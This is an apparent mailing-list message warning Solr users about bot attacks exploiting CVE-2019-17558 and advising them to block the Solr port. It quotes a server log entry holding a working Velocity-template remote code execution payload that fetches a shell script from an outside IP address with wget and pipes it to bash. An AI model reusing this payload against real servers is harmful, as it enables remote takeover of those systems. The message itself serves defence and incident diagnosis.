Victor & Satish,
Is your Solr accessible from the Internet by anyone? If so, your site is being
attacked by a bot using this security hole:
https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability
If that is the case, try blocking the Solr port from the Internet.
My client's Solr was experiencing the sudden death syndrome. In the log, there
were strange queries very similar to what you have here:
webapp=/solr path=/select
params={*q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity*}
status=400 QTime=1
2020-12-20 08:49:07.029 INFO (qtp401424608-8687) [c:sitecore_submittals_index
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3]
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type =
queryResponseWriter,name = velocity,class =
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity,
class=solr.VelocityResponseWriter, template.base.dir=,
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args =
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}
We configured the firewall to block the Solr port. After that, my client's Solr
node has been running for 4 weeks so far. I think this security hole doesn't
just leak the information but it can also kill the Solr process.
TK
